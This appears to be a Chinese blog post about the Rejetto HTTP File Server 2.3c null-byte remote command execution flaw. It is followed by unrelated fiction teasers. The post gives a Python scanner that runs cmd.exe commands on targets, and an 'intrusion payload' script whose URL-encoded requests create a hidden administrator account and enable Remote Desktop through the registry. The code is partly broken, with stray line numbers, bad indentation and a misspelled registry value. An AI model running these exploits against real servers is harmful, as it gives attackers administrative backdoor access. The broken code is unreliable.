HFS远程执行漏洞

1、漏洞说明

HFS是HTTP File Server,国外的一款HTTP 文件服务器软件,简单易上手。
Rejetto HTTP File Server 2.3c及之前版本中的parserLib.pas文件中的‘findMacroMarker’函数中存在安全漏洞,该漏洞源于parserLib.pas文件没有正确处理空字节。远程攻击者可借助搜索操作中的‘%00’序列利用该漏洞执行任意程序。

2、扫描器

  #-*- coding:utf-8 -*-
  
"""
  这个脚本是检测是否有HFS漏洞的
  当HFS版本处于2.3c机器之前的HFS2.3x版本均可以
  当HFS以管理员身份运行时候可以get-shell
  原理是创建一个新用户,设置密码和权限,然后你就可以RDP了
"""
  
#引入依赖的包、库文件
import time
import uuid
import requests
from optparse import OptionParser

 
 #定义扫描类
class HFSScanner:
"""
HFS扫描类,原理是:
       (1)生成随机字符串,利用命令执行写入远端服务器的HFS.exe目录下的一个文件。
       (2)然后再次利用这里漏洞将文件内容读取出来放在响应报文的头部字段set-cookie中。
       (3)通过判断响应报文该字段是否包含随机字符串来确定是否存在漏洞

 """
      def __init__(self,target,port):
"""创建扫描类实例对象"""
      self.__randomflag = uuid.uuid1() #攻击验证随机标志字符串
      self.__attack_url = r"http://%s:%s/"%(str(target),str(port))+"?search==%00"+r"{.exec|cmd.exe /c del result}"+r"{"+".exec|cmd.exe /c echo>result "+str(self.__randomflag)+"."+"}"
      self.__verify_url = r"http://%s:%s/"%(str(target),str(port))+"?search==%00"+"{.cookie|out|value={.load|result.}.}"

 33     def __attack(self):
34         """发送攻击报文,响应200后反回True"""
35         try:
36             response = requests.get(self.__attack_url,timeout=120)
37         except Exception,reason:
38             return False
39         if response.status_code != 200:
40             return False
41         return True
42 
43     def __verify(self):
44         """发送验证报文,判断set-cookie字段是否为随机标志字符串"""
45         try:
46             response = requests.get(self.__verify_url,timeout=120)
47         except Exception,reason:
48             return False
49         if response.headers.get("set-cookie").find(str(self.__randomflag)) >= 0:
50             return True
51         else:
52             return False
53 
54     def scan(self):
55         """扫描函数"""
56         print "[+] 开始测试..."
57         if self.__attack():
58             time.sleep(5)
59             if self.__verify():
60                 return True
61         return False
62 
63 if __name__ == "__main__":
64     parser = OptionParser("")
65     parser.add_option("-t", dest="target",help="target to scan")
66     parser.add_option("-p", dest="port",help="port to scan")
67     (options, args) = parser.parse_args()
68     if options.target in ["",None]:
69         print "[-] 请输入正确的参数!"
70         print """
71             正确的使用方法:
72             #python hfs_vuln_scan.py -t 127.0.0.1 [-p 8080]
73         """
74         exit(0)
75     if options.port in ["",None] or int(options.port) <= 0 and int(options.port) > 65535:
76         options.port = "80"
77     scanner = HFSScanner(options.target,options.port)
78     if scanner.scan():
79         print "[*] 目标主机存在漏洞"
80     else:
81         print "[+] 目标主机不存在漏洞"

3、入侵payload

python 编写入侵payload
"""
1.接受输入的漏洞地址
2.组合漏洞地址并请求
3.判断漏洞是否利用成功
4.将利用成功的进行输出
"""
import requests

url = "http://192.168.1.1"  # 这里换成自己hfs服务器的地址

add_user ="/?search==%00%7B.exec%7Ccmd.exe%20/c%20net%20user%20Adminzhuai%20adminzhuai%20/add%20%26%20net%20localgroup%20administrators%20Adminzhuai%20/add.%7D"
# 创建用户Adminzhuai adminzhuai 并添加到管理员
open3389 ="/?search==%00%7B.exec%7Ccmd.exe%20/c%20REG%20ADD%20HKLM%5CSYSTEM%5CCurrentControlSet%5CControl%5CTerminal%22%20%22Server%20/v%20fDenyTSCconneections%20/t%20REG_DWORD%20/d%2000000000%20/f.%7D"
# 开启3389端口

    url_adduser = url + add_user
    url_open3389 = url + open3389
    
    def adduser():
        code = requests.get(url_adduser).status_code
        if code == 200:
            print("添加用户成功")
        else:
            print("添加用户失败")
    def open3389():
        code2 = requests.get(url_open3389).status_code
        if code2 ==200:
            print("开启3389成功")
        else:
            print("开启3389失败")
    
    adduser()
    open3389()

4、攻击工具演示

靶机用户及3389情况

image.png

image.png

扫描工具发现开启HFS服务
image.png

攻击工具进行攻击

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 229,565评论 6 539
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 99,115评论 3 423
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 177,577评论 0 382
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 63,514评论 1 316
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 72,234评论 6 410
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 55,621评论 1 326
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 43,641评论 3 444
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 42,822评论 0 289
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 49,380评论 1 335
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 41,128评论 3 356
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 43,319评论 1 371
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 38,879评论 5 362
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 44,548评论 3 348
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 34,970评论 0 28
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 36,229评论 1 291
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 52,048评论 3 397
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 48,285评论 2 376